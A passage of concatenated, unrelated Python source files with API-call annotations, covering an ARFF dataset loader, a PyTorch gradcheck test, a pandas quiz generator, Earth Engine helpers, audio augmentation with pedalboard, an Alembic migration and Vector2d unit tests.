order = self.LexOrder(rows[0], rows[1])
if order == 1:
rows.reverse()
return rows
def Fetch(self, *fields:list[str], limit:int = None, offset:int = 0):
cols = []
data = []
# iterate over the field names and find the column indices
# for names that match the requested field names
for (i, field) in enumerate(fields):
try:
cols.append(self.attributes_.index(field))
except ValueError:
pass
end = limit
if limit != None:
end += offset
for row in self.data_[offset:end]:
data.append([row[i] for i in cols])
return data
def FetchFilter_(self, i, value):
# Not used any more
#if self.types_[i] == 'REAL':
# return float(value)
#elif self.types_[i] == 'INTEGER':
# return int(value)
#else:
# return value
pass
def Size(self):
length = len(self.data_)
if length == 0:
return (len(self.data_), None)
return (len(self.data_), len(self.data_[0]))
def Shuffle(self):
random.shuffle(self.data_)
class Pistachio(ArffDataset):
SettingsKey = 'PistachioDataset'
def __init__(self, newline:str = Dataset.WIN_NL) -> None:
settings = Settings.Data()
super().__init__(
path = settings[Pistachio.SettingsKey]['Path'],
filename = settings[Pistachio.SettingsKey]['FileName'],
newline = newline
)
#pist = Pistachio(Dataset.LINUX_NL)
#
#for row in pist.Load()[0:10]:
# print(row)
| [
"random.shuffle",
"math.floor",
"os.sep.join",
"Settings.Settings.Data",
"typing.TypeVar"
]
| [((157, 173), 'typing.TypeVar', 'TypeVar', (['"""DataT"""'], {}), "('DataT')\n", (164, 173), False, 'from typing import TypeVar\n'), ((6860, 6886), 'random.shuffle', 'random.shuffle', (['self.data_'], {}), '(self.data_)\n', (6874, 6886), False, 'import random\n'), ((7037, 7052), 'Settings.Settings.Data', 'Settings.Data', ([], {}), '()\n', (7050, 7052), False, 'from Settings import Settings\n'), ((841, 882), 'os.sep.join', 'os.sep.join', (['[self.path_, self.filename_]'], {}), '([self.path_, self.filename_])\n', (852, 882), False, 'import os\n'), ((4738, 4764), 'math.floor', 'math.floor', (['(rows_len * 0.5)'], {}), '(rows_len * 0.5)\n', (4748, 4764), False, 'import math\n'), ((4799, 4825), 'math.floor', 'math.floor', (['(rows_len * 0.5)'], {}), '(rows_len * 0.5)\n', (4809, 4825), False, 'import math\n')] |
# Copyright (c) OpenMMLab. All rights reserved.
import pytest
import torch
_USING_PARROTS = True
try:
from parrots.autograd import gradcheck
except ImportError:
from torch.autograd import gradcheck, gradgradcheck
_USING_PARROTS = False
class TestUpFirDn2d:
"""Unit test for UpFirDn2d.
Here, we just test the basic case of upsample version. More gerneal tests
will be included in other unit test for UpFirDnUpsample and
UpFirDnDownSample modules.
"""
@classmethod
def setup_class(cls):
kernel_1d = torch.tensor([1., 3., 3., 1.])
cls.kernel = kernel_1d[:, None] * kernel_1d[None, :]
cls.kernel = cls.kernel / cls.kernel.sum()
cls.factor = 2
pad = cls.kernel.shape[0] - cls.factor
cls.pad = ((pad + 1) // 2 + cls.factor - 1, pad // 2)
cls.input_tensor = torch.randn((2, 3, 4, 4), requires_grad=True)
@pytest.mark.skipif(not torch.cuda.is_available(), reason='requires cuda')
def test_upfirdn2d(self):
from mmcv.ops import upfirdn2d
if _USING_PARROTS:
gradcheck(
upfirdn2d,
(self.input_tensor.cuda(),
self.kernel.type_as(
self.input_tensor).cuda(), self.factor, 1, self.pad),
delta=1e-4,
pt_atol=1e-3)
else:
gradcheck(
upfirdn2d,
(self.input_tensor.cuda(),
self.kernel.type_as(
self.input_tensor).cuda(), self.factor, 1, self.pad),
eps=1e-4,
atol=1e-3)
gradgradcheck(
upfirdn2d,
(self.input_tensor.cuda(),
self.kernel.type_as(
self.input_tensor).cuda(), self.factor, 1, self.pad),
eps=1e-4,
atol=1e-3)
| [
"torch.tensor",
"torch.cuda.is_available",
"torch.randn"
]
| [((550, 584), 'torch.tensor', 'torch.tensor', (['[1.0, 3.0, 3.0, 1.0]'], {}), '([1.0, 3.0, 3.0, 1.0])\n', (562, 584), False, 'import torch\n'), ((853, 898), 'torch.randn', 'torch.randn', (['(2, 3, 4, 4)'], {'requires_grad': '(True)'}), '((2, 3, 4, 4), requires_grad=True)\n', (864, 898), False, 'import torch\n'), ((928, 953), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (951, 953), False, 'import torch\n')] |
import pandas as pd
from tqdm import tqdm
data_list = []
def get_questions(row):
global data_list
random_samples = df.sample(n=num_choices - 1)
distractors = random_samples["description"].tolist()
data = {
"question": "What is " + row["label"] + "?",
"correct": row["description"],
"distractors": distractors,
"knowledge": "{" + row["label"] + " : " + row["description"] + "}",
}
data_list.append(data)
debug = False
num_choices = 4
tqdm.pandas(desc="Progress")
df = pd.read_pickle("data/augmented_datasets/pickle/label_description.pkl")
if debug:
df = df.iloc[:10]
df = df.progress_apply(get_questions, axis=1)
new_df = pd.DataFrame(data_list)
if not debug:
new_df.to_pickle("data/augmented_datasets/pickle/description_qa_knowledge.pkl")
else:
__import__("pudb").set_trace()
| [
"pandas.read_pickle",
"tqdm.tqdm.pandas",
"pandas.DataFrame"
]
| [((495, 523), 'tqdm.tqdm.pandas', 'tqdm.pandas', ([], {'desc': '"""Progress"""'}), "(desc='Progress')\n", (506, 523), False, 'from tqdm import tqdm\n'), ((529, 599), 'pandas.read_pickle', 'pd.read_pickle', (['"""data/augmented_datasets/pickle/label_description.pkl"""'], {}), "('data/augmented_datasets/pickle/label_description.pkl')\n", (543, 599), True, 'import pandas as pd\n'), ((689, 712), 'pandas.DataFrame', 'pd.DataFrame', (['data_list'], {}), '(data_list)\n', (701, 712), True, 'import pandas as pd\n')] |
import json
from threading import Semaphore
import ee
from flask import request
from google.auth import crypt
from google.oauth2 import service_account
from google.oauth2.credentials import Credentials
service_account_credentials = None
import logging
export_semaphore = Semaphore(5)
get_info_semaphore = Semaphore(2)
def init_service_account_credentials(args):
global service_account_credentials
with open(args['gee_key_path'], 'r') as file_:
key_data = file_.read()
signer = crypt.RSASigner.from_string(key_data)
service_account_credentials = service_account.Credentials(
signer=signer,
service_account_email=args['gee_email'],
token_uri=ee.oauth.TOKEN_URI,
scopes=ee.oauth.SCOPES + ['https://www.googleapis.com/auth/drive']
)
def init_ee():
credentials = service_account_credentials
if 'sepal-user' in request.headers:
user = json.loads(request.headers['sepal-user'])
googleTokens = user.get('googleTokens', None)
if googleTokens:
credentials = Credentials(googleTokens['accessToken'])
ee.InitializeThread(credentials)
def to_asset_id(asset_path):
asset_roots = ee.data.getAssetRoots()
if not asset_roots:
raise Exception('User has no GEE asset roots')
return asset_roots[0]['id'] + '/' + asset_path
def delete_asset_collection(asset_id):
logging.info('Recursively deleting ' + asset_id)
if ee.data.getInfo(asset_id):
images = ee.data.getList({
'id': asset_id,
'fields': 'id'
})
for image in images:
ee.data.deleteAsset(image['id'])
logging.info('Deleted ' + image['id'])
ee.data.deleteAsset(asset_id)
logging.info('Deleted ' + asset_id)
def create_asset_image_collection(asset_id):
delete_asset_collection(asset_id)
ee.data.create_assets(
asset_ids=[asset_id],
asset_type=ee.data.ASSET_TYPE_IMAGE_COLL,
mk_parents=True
)
def create_asset_folder(asset_id):
ee.data.create_assets(
asset_ids=[asset_id],
asset_type=ee.data.ASSET_TYPE_FOLDER,
mk_parents=True
)
def get_info(ee_object):
try:
get_info_semaphore.acquire()
return ee_object.getInfo()
finally:
get_info_semaphore.release()
| [
"ee.data.getList",
"ee.InitializeThread",
"ee.data.getAssetRoots",
"json.loads",
"google.oauth2.credentials.Credentials",
"ee.data.deleteAsset",
"google.auth.crypt.RSASigner.from_string",
"threading.Semaphore",
"ee.data.create_assets",
"ee.data.getInfo",
"google.oauth2.service_account.Credentials",
"logging.info"
]
| [((274, 286), 'threading.Semaphore', 'Semaphore', (['(5)'], {}), '(5)\n', (283, 286), False, 'from threading import Semaphore\n'), ((308, 320), 'threading.Semaphore', 'Semaphore', (['(2)'], {}), '(2)\n', (317, 320), False, 'from threading import Semaphore\n'), ((503, 540), 'google.auth.crypt.RSASigner.from_string', 'crypt.RSASigner.from_string', (['key_data'], {}), '(key_data)\n', (530, 540), False, 'from google.auth import crypt\n'), ((575, 766), 'google.oauth2.service_account.Credentials', 'service_account.Credentials', ([], {'signer': 'signer', 'service_account_email': "args['gee_email']", 'token_uri': 'ee.oauth.TOKEN_URI', 'scopes': "(ee.oauth.SCOPES + ['https://www.googleapis.com/auth/drive'])"}), "(signer=signer, service_account_email=args[\n 'gee_email'], token_uri=ee.oauth.TOKEN_URI, scopes=ee.oauth.SCOPES + [\n 'https://www.googleapis.com/auth/drive'])\n", (602, 766), False, 'from google.oauth2 import service_account\n'), ((1105, 1137), 'ee.InitializeThread', 'ee.InitializeThread', (['credentials'], {}), '(credentials)\n', (1124, 1137), False, 'import ee\n'), ((1187, 1210), 'ee.data.getAssetRoots', 'ee.data.getAssetRoots', ([], {}), '()\n', (1208, 1210), False, 'import ee\n'), ((1386, 1434), 'logging.info', 'logging.info', (["('Recursively deleting ' + asset_id)"], {}), "('Recursively deleting ' + asset_id)\n", (1398, 1434), False, 'import logging\n'), ((1442, 1467), 'ee.data.getInfo', 'ee.data.getInfo', (['asset_id'], {}), '(asset_id)\n', (1457, 1467), False, 'import ee\n'), ((1866, 1973), 'ee.data.create_assets', 'ee.data.create_assets', ([], {'asset_ids': '[asset_id]', 'asset_type': 'ee.data.ASSET_TYPE_IMAGE_COLL', 'mk_parents': '(True)'}), '(asset_ids=[asset_id], asset_type=ee.data.\n ASSET_TYPE_IMAGE_COLL, mk_parents=True)\n', (1887, 1973), False, 'import ee\n'), ((2040, 2143), 'ee.data.create_assets', 'ee.data.create_assets', ([], {'asset_ids': '[asset_id]', 'asset_type': 'ee.data.ASSET_TYPE_FOLDER', 'mk_parents': '(True)'}), '(asset_ids=[asset_id], asset_type=ee.data.\n ASSET_TYPE_FOLDER, mk_parents=True)\n', (2061, 2143), False, 'import ee\n'), ((913, 954), 'json.loads', 'json.loads', (["request.headers['sepal-user']"], {}), "(request.headers['sepal-user'])\n", (923, 954), False, 'import json\n'), ((1486, 1535), 'ee.data.getList', 'ee.data.getList', (["{'id': asset_id, 'fields': 'id'}"], {}), "({'id': asset_id, 'fields': 'id'})\n", (1501, 1535), False, 'import ee\n'), ((1703, 1732), 'ee.data.deleteAsset', 'ee.data.deleteAsset', (['asset_id'], {}), '(asset_id)\n', (1722, 1732), False, 'import ee\n'), ((1741, 1776), 'logging.info', 'logging.info', (["('Deleted ' + asset_id)"], {}), "('Deleted ' + asset_id)\n", (1753, 1776), False, 'import logging\n'), ((1060, 1100), 'google.oauth2.credentials.Credentials', 'Credentials', (["googleTokens['accessToken']"], {}), "(googleTokens['accessToken'])\n", (1071, 1100), False, 'from google.oauth2.credentials import Credentials\n'), ((1611, 1643), 'ee.data.deleteAsset', 'ee.data.deleteAsset', (["image['id']"], {}), "(image['id'])\n", (1630, 1643), False, 'import ee\n'), ((1656, 1694), 'logging.info', 'logging.info', (["('Deleted ' + image['id'])"], {}), "('Deleted ' + image['id'])\n", (1668, 1694), False, 'import logging\n')] |
from pedalboard import Reverb, Compressor, Gain, LowpassFilter, Pedalboard
import soundfile as sf
if __name__ == '__main__':
# replace by path of unprocessed piano file if necessar
fn_wav_source = 'live_grand_piano.wav'
# augmentation settings using Pedalboard library
settings = {'rev-': [Reverb(room_size=.4)],
'rev+': [Reverb(room_size=.8)],
'comp+': [Compressor(threshold_db=-15, ratio=20)],
'comp-': [Compressor(threshold_db=-10, ratio=10)],
'gain+': [Gain(gain_db=15)], # clipping
'gain-': [Gain(gain_db=5)],
'lpf-': [LowpassFilter(cutoff_frequency_hz=50)],
'lpf+': [LowpassFilter(cutoff_frequency_hz=250)]}
# create augmented versions
for s in settings.keys():
# load unprocessed piano recording
audio, sample_rate = sf.read(fn_wav_source)
# create Pedalboard object
board = Pedalboard(settings[s])
# create augmented audio
effected = board(audio, sample_rate)
# save it
fn_target = fn_wav_source.replace('.wav', f'_{s}.wav')
sf.write(fn_target, effected, sample_rate)
| [
"pedalboard.LowpassFilter",
"pedalboard.Pedalboard",
"pedalboard.Reverb",
"soundfile.write",
"pedalboard.Compressor",
"pedalboard.Gain",
"soundfile.read"
]
| [((883, 905), 'soundfile.read', 'sf.read', (['fn_wav_source'], {}), '(fn_wav_source)\n', (890, 905), True, 'import soundfile as sf\n'), ((958, 981), 'pedalboard.Pedalboard', 'Pedalboard', (['settings[s]'], {}), '(settings[s])\n', (968, 981), False, 'from pedalboard import Reverb, Compressor, Gain, LowpassFilter, Pedalboard\n'), ((1151, 1193), 'soundfile.write', 'sf.write', (['fn_target', 'effected', 'sample_rate'], {}), '(fn_target, effected, sample_rate)\n', (1159, 1193), True, 'import soundfile as sf\n'), ((310, 331), 'pedalboard.Reverb', 'Reverb', ([], {'room_size': '(0.4)'}), '(room_size=0.4)\n', (316, 331), False, 'from pedalboard import Reverb, Compressor, Gain, LowpassFilter, Pedalboard\n'), ((358, 379), 'pedalboard.Reverb', 'Reverb', ([], {'room_size': '(0.8)'}), '(room_size=0.8)\n', (364, 379), False, 'from pedalboard import Reverb, Compressor, Gain, LowpassFilter, Pedalboard\n'), ((407, 445), 'pedalboard.Compressor', 'Compressor', ([], {'threshold_db': '(-15)', 'ratio': '(20)'}), '(threshold_db=-15, ratio=20)\n', (417, 445), False, 'from pedalboard import Reverb, Compressor, Gain, LowpassFilter, Pedalboard\n'), ((474, 512), 'pedalboard.Compressor', 'Compressor', ([], {'threshold_db': '(-10)', 'ratio': '(10)'}), '(threshold_db=-10, ratio=10)\n', (484, 512), False, 'from pedalboard import Reverb, Compressor, Gain, LowpassFilter, Pedalboard\n'), ((541, 557), 'pedalboard.Gain', 'Gain', ([], {'gain_db': '(15)'}), '(gain_db=15)\n', (545, 557), False, 'from pedalboard import Reverb, Compressor, Gain, LowpassFilter, Pedalboard\n'), ((598, 613), 'pedalboard.Gain', 'Gain', ([], {'gain_db': '(5)'}), '(gain_db=5)\n', (602, 613), False, 'from pedalboard import Reverb, Compressor, Gain, LowpassFilter, Pedalboard\n'), ((641, 678), 'pedalboard.LowpassFilter', 'LowpassFilter', ([], {'cutoff_frequency_hz': '(50)'}), '(cutoff_frequency_hz=50)\n', (654, 678), False, 'from pedalboard import Reverb, Compressor, Gain, LowpassFilter, Pedalboard\n'), ((706, 744), 'pedalboard.LowpassFilter', 'LowpassFilter', ([], {'cutoff_frequency_hz': '(250)'}), '(cutoff_frequency_hz=250)\n', (719, 744), False, 'from pedalboard import Reverb, Compressor, Gain, LowpassFilter, Pedalboard\n')] |
"""add_request_system
Revision: <KEY>
Revises: 31b92bf6506d
Created: 2013-07-23 02:49:09.342814
"""
revision = '<KEY>'
down_revision = '31b92bf6506d'
from alembic import op
from spire.schema.fields import *
from spire.mesh import SurrogateType
from sqlalchemy import (Column, ForeignKey, ForeignKeyConstraint, PrimaryKeyConstraint,
CheckConstraint, UniqueConstraint)
from sqlalchemy.dialects import postgresql
def upgrade():
op.create_table('request',
Column('id', UUIDType(), nullable=False),
Column('name', TextType(), nullable=False),
Column('status', EnumerationType(), nullable=False),
Column('originator', TokenType(), nullable=False),
Column('assignee', TokenType(), nullable=False),
PrimaryKeyConstraint('id'),
UniqueConstraint('name'),
)
op.create_table('request_slot',
Column('id', UUIDType(), nullable=False),
Column('request_id', UUIDType(), nullable=False),
Column('token', TokenType(), nullable=False),
Column('title', TextType(), nullable=True),
Column('slot', TokenType(), nullable=False),
ForeignKeyConstraint(['request_id'], ['request.id'], ondelete='CASCADE'),
PrimaryKeyConstraint('id'),
UniqueConstraint('request_id','token'),
)
op.create_table('request_attachment',
Column('id', UUIDType(), nullable=False),
Column('request_id', UUIDType(), nullable=False),
Column('token', TokenType(), nullable=True),
Column('title', TextType(), nullable=True),
Column('attachment', SurrogateType(), nullable=False),
ForeignKeyConstraint(['request_id'], ['request.id'], ondelete='CASCADE'),
PrimaryKeyConstraint('id'),
)
op.create_table('request_product',
Column('id', UUIDType(), nullable=False),
Column('request_id', UUIDType(), nullable=False),
Column('token', TokenType(), nullable=False),
Column('title', TextType(), nullable=True),
Column('product', SurrogateType(), nullable=False),
ForeignKeyConstraint(['request_id'], ['request.id'], ondelete='CASCADE'),
PrimaryKeyConstraint('id'),
UniqueConstraint('request_id','token'),
)
op.create_table('message',
Column('id', UUIDType(), nullable=False),
Column('request_id', UUIDType(), nullable=False),
Column('author', TokenType(), nullable=False),
Column('occurrence', DateTimeType(timezone=True), nullable=False),
Column('message', TextType(), nullable=True),
ForeignKeyConstraint(['request_id'], ['request.id'], ondelete='CASCADE'),
PrimaryKeyConstraint('id'),
)
def downgrade():
op.drop_table('message')
op.drop_table('request_product')
op.drop_table('request_attachment')
op.drop_table('request_slot')
op.drop_table('request')
| [
"sqlalchemy.ForeignKeyConstraint",
"alembic.op.drop_table",
"spire.mesh.SurrogateType",
"sqlalchemy.PrimaryKeyConstraint",
"sqlalchemy.UniqueConstraint"
]
| [((2690, 2714), 'alembic.op.drop_table', 'op.drop_table', (['"""message"""'], {}), "('message')\n", (2703, 2714), False, 'from alembic import op\n'), ((2719, 2751), 'alembic.op.drop_table', 'op.drop_table', (['"""request_product"""'], {}), "('request_product')\n", (2732, 2751), False, 'from alembic import op\n'), ((2756, 2791), 'alembic.op.drop_table', 'op.drop_table', (['"""request_attachment"""'], {}), "('request_attachment')\n", (2769, 2791), False, 'from alembic import op\n'), ((2796, 2825), 'alembic.op.drop_table', 'op.drop_table', (['"""request_slot"""'], {}), "('request_slot')\n", (2809, 2825), False, 'from alembic import op\n'), ((2830, 2854), 'alembic.op.drop_table', 'op.drop_table', (['"""request"""'], {}), "('request')\n", (2843, 2854), False, 'from alembic import op\n'), ((751, 777), 'sqlalchemy.PrimaryKeyConstraint', 'PrimaryKeyConstraint', (['"""id"""'], {}), "('id')\n", (771, 777), False, 'from sqlalchemy import Column, ForeignKey, ForeignKeyConstraint, PrimaryKeyConstraint, CheckConstraint, UniqueConstraint\n'), ((787, 811), 'sqlalchemy.UniqueConstraint', 'UniqueConstraint', (['"""name"""'], {}), "('name')\n", (803, 811), False, 'from sqlalchemy import Column, ForeignKey, ForeignKeyConstraint, PrimaryKeyConstraint, CheckConstraint, UniqueConstraint\n'), ((1130, 1202), 'sqlalchemy.ForeignKeyConstraint', 'ForeignKeyConstraint', (["['request_id']", "['request.id']"], {'ondelete': '"""CASCADE"""'}), "(['request_id'], ['request.id'], ondelete='CASCADE')\n", (1150, 1202), False, 'from sqlalchemy import Column, ForeignKey, ForeignKeyConstraint, PrimaryKeyConstraint, CheckConstraint, UniqueConstraint\n'), ((1212, 1238), 'sqlalchemy.PrimaryKeyConstraint', 'PrimaryKeyConstraint', (['"""id"""'], {}), "('id')\n", (1232, 1238), False, 'from sqlalchemy import Column, ForeignKey, ForeignKeyConstraint, PrimaryKeyConstraint, CheckConstraint, UniqueConstraint\n'), ((1248, 1287), 'sqlalchemy.UniqueConstraint', 'UniqueConstraint', (['"""request_id"""', '"""token"""'], {}), "('request_id', 'token')\n", (1264, 1287), False, 'from sqlalchemy import Column, ForeignKey, ForeignKeyConstraint, PrimaryKeyConstraint, CheckConstraint, UniqueConstraint\n'), ((1620, 1692), 'sqlalchemy.ForeignKeyConstraint', 'ForeignKeyConstraint', (["['request_id']", "['request.id']"], {'ondelete': '"""CASCADE"""'}), "(['request_id'], ['request.id'], ondelete='CASCADE')\n", (1640, 1692), False, 'from sqlalchemy import Column, ForeignKey, ForeignKeyConstraint, PrimaryKeyConstraint, CheckConstraint, UniqueConstraint\n'), ((1702, 1728), 'sqlalchemy.PrimaryKeyConstraint', 'PrimaryKeyConstraint', (['"""id"""'], {}), "('id')\n", (1722, 1728), False, 'from sqlalchemy import Column, ForeignKey, ForeignKeyConstraint, PrimaryKeyConstraint, CheckConstraint, UniqueConstraint\n'), ((2057, 2129), 'sqlalchemy.ForeignKeyConstraint', 'ForeignKeyConstraint', (["['request_id']", "['request.id']"], {'ondelete': '"""CASCADE"""'}), "(['request_id'], ['request.id'], ondelete='CASCADE')\n", (2077, 2129), False, 'from sqlalchemy import Column, ForeignKey, ForeignKeyConstraint, PrimaryKeyConstraint, CheckConstraint, UniqueConstraint\n'), ((2139, 2165), 'sqlalchemy.PrimaryKeyConstraint', 'PrimaryKeyConstraint', (['"""id"""'], {}), "('id')\n", (2159, 2165), False, 'from sqlalchemy import Column, ForeignKey, ForeignKeyConstraint, PrimaryKeyConstraint, CheckConstraint, UniqueConstraint\n'), ((2175, 2214), 'sqlalchemy.UniqueConstraint', 'UniqueConstraint', (['"""request_id"""', '"""token"""'], {}), "('request_id', 'token')\n", (2191, 2214), False, 'from sqlalchemy import Column, ForeignKey, ForeignKeyConstraint, PrimaryKeyConstraint, CheckConstraint, UniqueConstraint\n'), ((2552, 2624), 'sqlalchemy.ForeignKeyConstraint', 'ForeignKeyConstraint', (["['request_id']", "['request.id']"], {'ondelete': '"""CASCADE"""'}), "(['request_id'], ['request.id'], ondelete='CASCADE')\n", (2572, 2624), False, 'from sqlalchemy import Column, ForeignKey, ForeignKeyConstraint, PrimaryKeyConstraint, CheckConstraint, UniqueConstraint\n'), ((2634, 2660), 'sqlalchemy.PrimaryKeyConstraint', 'PrimaryKeyConstraint', (['"""id"""'], {}), "('id')\n", (2654, 2660), False, 'from sqlalchemy import Column, ForeignKey, ForeignKeyConstraint, PrimaryKeyConstraint, CheckConstraint, UniqueConstraint\n'), ((1578, 1593), 'spire.mesh.SurrogateType', 'SurrogateType', ([], {}), '()\n', (1591, 1593), False, 'from spire.mesh import SurrogateType\n'), ((2015, 2030), 'spire.mesh.SurrogateType', 'SurrogateType', ([], {}), '()\n', (2028, 2030), False, 'from spire.mesh import SurrogateType\n')] |
# Copyright (C) 2021 Open Source Robotics Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import math
from ignition.math import Vector2d
from ignition.math import Vector2f
class TestVector2(unittest.TestCase):
def test_construction(self):
v = Vector2d()
self.assertAlmostEqual(0.0, v.x())
self.assertAlmostEqual(0.0, v.y())
vec = Vector2d(1, 0)
self.assertEqual(vec.x(), 1)
self.assertEqual(vec.y(), 0)
vec2 = Vector2d(vec)
self.assertEqual(vec2, vec)
# Copy
vec3 = vec
self.assertEqual(vec3, vec)
# Inequality
vec4 = Vector2d()
self.assertNotEqual(vec, vec4)
def test_vector2(self):
v = Vector2d(1, 2)
# Distance
self.assertAlmostEqual(2.236, v.distance(Vector2d()), delta=1e-2)
# Normalize
v.normalize()
self.assertTrue(v.equal(Vector2d(0.447214, 0.894427), 1e-4))
# Set
v.set(4, 5)
self.assertTrue(v.equal(Vector2d(4, 5), 1e-4))
# Abs
v.set(-1, -2)
self.assertTrue(v.abs().equal(Vector2d(1, 2), 1e-4))
# _eq_
v = Vector2d(6, 7)
self.assertTrue(v.equal(Vector2d(6, 7), 1e-4))
# _add_
v = v + Vector2d(1, 2)
self.assertTrue(v.equal(Vector2d(7, 9), 1e-4))
v += Vector2d(5, 6)
self.assertTrue(v.equal(Vector2d(12, 15), 1e-4))
# __sub__
v = v - Vector2d(2, 4)
self.assertTrue(v.equal(Vector2d(10, 11), 1e-4))
v.set(2, 4)
v -= Vector2d(1, 6)
self.assertTrue(v.equal(Vector2d(1, -2), 1e-4))
# __truediv__
v.set(10, 6)
v = v / Vector2d(2, 3)
self.assertTrue(v.equal(Vector2d(5, 2), 1e-4))
v.set(10, 6)
v /= Vector2d(2, 3)
self.assertTrue(v.equal(Vector2d(5, 2), 1e-4))
# __truediv__ int
v.set(10, 6)
v = v / 2
self.assertTrue(v.equal(Vector2d(5, 3), 1e-4))
v.set(10, 6)
v /= 2
self.assertTrue(v.equal(Vector2d(5, 3), 1e-4))
# __mul__
v.set(10, 6)
v = v * Vector2d(2, 4)
self.assertTrue(v.equal(Vector2d(20, 24), 1e-4))
v.set(10, 6)
v *= Vector2d(2, 4)
self.assertTrue(v.equal(Vector2d(20, 24), 1e-4))
# __mul__ int
v.set(10, 6)
v = v * 2
self.assertTrue(v.equal(Vector2d(20, 12), 1e-4))
v.set(10, 6)
v *= 2
self.assertTrue(v.equal(Vector2d(20, 12), 1e-4))
# is_finite
self.assertTrue(v.is_finite())
def test_max(self):
vec1 = Vector2d(0.1, 0.2)
vec2 = Vector2d(0.3, 0.5)
vec3 = Vector2d(0.4, 0.2)
self.assertAlmostEqual(vec1.max(), 0.2)
self.assertAlmostEqual(vec3.max(), 0.4)
vec1.max(vec2)
self.assertAlmostEqual(vec1, Vector2d(0.3, 0.5))
vec1.max(vec3)
self.assertAlmostEqual(vec1, Vector2d(0.4, 0.5))
def test_min(self):
vec1 = Vector2d(0.3, 0.5)
vec2 = Vector2d(0.1, 0.2)
vec3 = Vector2d(0.05, 0.1)
self.assertAlmostEqual(vec1.min(), 0.3)
self.assertAlmostEqual(vec3.min(), 0.05)
vec1.min(vec2)
self.assertAlmostEqual(vec1, Vector2d(0.1, 0.2))
vec1.min(vec3)
self.assertAlmostEqual(vec1, Vector2d(0.05, 0.1))
def test_equal_tolerance(self):
# Test Equal function with specified tolerance
self.assertFalse(Vector2d.ZERO.equal(Vector2d.ONE, 1e-6))
self.assertFalse(Vector2d.ZERO.equal(Vector2d.ONE, 1e-3))
self.assertFalse(Vector2d.ZERO.equal(Vector2d.ONE, 1e-1))
self.assertTrue(Vector2d.ZERO.equal(Vector2d.ONE, 1))
self.assertTrue(Vector2d.ZERO.equal(Vector2d.ONE, 1.1))
def test_dot(self):
v = Vector2d(1, 2)
self.assertAlmostEqual(v.dot(Vector2d(3, 4)), 11.0)
self.assertAlmostEqual(v.dot(Vector2d(0, 0)), 0.0)
self.assertAlmostEqual(v.dot(Vector2d(1, 0)), 1.0)
self.assertAlmostEqual(v.dot(Vector2d(0, 1)), 2.0)
def test_correct(self):
vec1 = Vector2d(0, float("nan"))
vec2 = Vector2d(float("inf"), -1)
vec3 = Vector2d(10, -2)
vec1.correct()
vec2.correct()
vec3.correct()
self.assertAlmostEqual(vec1, Vector2d(0, 0))
self.assertAlmostEqual(vec2, Vector2d(0, -1))
self.assertAlmostEqual(vec3, Vector2d(10, -2))
def test_abs_dot(self):
v = Vector2d(1, -2)
self.assertAlmostEqual(v.abs_dot(Vector2d(3, 4)), 11.0)
self.assertAlmostEqual(v.abs_dot(Vector2d(0, 0)), 0.0)
self.assertAlmostEqual(v.abs_dot(Vector2d(1, 0)), 1.0)
self.assertAlmostEqual(v.abs_dot(Vector2d(0, 1)), 2.0)
def test_add(self):
vec1 = Vector2d(0.1, 0.2)
vec2 = Vector2d(1.1, 2.2)
vec3 = vec1
vec3 += vec2
self.assertAlmostEqual(vec1 + vec2, Vector2d(1.2, 2.4))
self.assertAlmostEqual(vec3, Vector2d(1.2, 2.4))
# Add zero
# Scalar right
self.assertEqual(vec1 + 0, vec1)
# Vector left and right
self.assertAlmostEqual(Vector2d.ZERO + vec1, vec1)
self.assertAlmostEqual(vec1 + Vector2d.ZERO, vec1)
# Addition assigment
vec4 = Vector2d(vec1)
vec4 += 0
self.assertEqual(vec4, vec1)
vec4 += Vector2d.ZERO
self.assertAlmostEqual(vec4, vec1)
# Add non-trivial scalar values left and right
self.assertEqual(vec1 + 2.5, Vector2d(2.6, 2.7))
vec1 = vec4
vec4 += 2.5
self.assertEqual(vec4, Vector2d(2.6, 2.7))
def test_sub(self):
vec1 = Vector2d(0.1, 0.2)
vec2 = Vector2d(1.1, 2.2)
vec3 = vec2
vec3 -= vec1
self.assertAlmostEqual(vec2 - vec1, Vector2d(1.0, 2.0))
self.assertAlmostEqual(vec3, Vector2d(1.0, 2.0))
# Subtraction with zeros
# Scalar right
self.assertEqual(vec1 - 0, vec1)
# Vector left and right
self.assertAlmostEqual(Vector2d.ZERO - vec1, -vec1)
self.assertAlmostEqual(vec1 - Vector2d.ZERO, vec1)
# Subtraction assignment
vec4 = Vector2d(vec1)
vec4 -= 0
self.assertEqual(vec4, vec1)
vec4 -= Vector2d.ZERO
self.assertAlmostEqual(vec4, vec1)
# Subtract non-trivial scalar values left and right
self.assertEqual(vec1 - 2.5, -Vector2d(2.4, 2.3))
vec4 = vec1
vec4 -= 2.5
self.assertEqual(vec4, -Vector2d(2.4, 2.3))
def test_multiply(self):
v = Vector2d(0.1, -4.2)
vec2 = v * 2.0
self.assertEqual(vec2, Vector2d(0.2, -8.4))
vec2 *= 4.0
self.assertEqual(vec2, Vector2d(0.8, -33.6))
# Multiply by zero
# Scalar right
self.assertEqual(v * 0, Vector2d.ZERO)
# Element-wise vector multiplication
self.assertEqual(v * Vector2d.ZERO, Vector2d.ZERO)
# Multiply by one
# Scalar right
self.assertEqual(v * 1, v)
# Element-wise vector multiplication
self.assertEqual(v * Vector2d.ONE, v)
# Multiply by non-trivial scalar value
scalar = 2.5
expect = Vector2d(0.25, -10.5)
self.assertEqual(v * scalar, expect)
# Multiply by itself element-wise
v.set(0.1, 0.5)
self.assertAlmostEqual(v * v, Vector2d(0.01, 0.25))
def test_lenght(self):
# Zero vector
self.assertAlmostEqual(Vector2d.ZERO.length(), 0.0)
self.assertAlmostEqual(Vector2d.ZERO.squared_length(), 0.0)
# One vector
self.assertAlmostEqual(Vector2d.ONE.length(),
math.sqrt(2), delta=1e-10)
self.assertAlmostEqual(Vector2d.ONE.squared_length(), 2.0)
# Arbitrary vector
v = Vector2d(0.1, -4.2)
self.assertAlmostEqual(v.length(), 4.20119030752, delta=1e-10)
self.assertAlmostEqual(v.squared_length(), 17.65)
# Integer vector
v = Vector2d(3, 4)
self.assertAlmostEqual(v.length(), 5)
self.assertAlmostEqual(v.squared_length(), 25)
def test_nan(self):
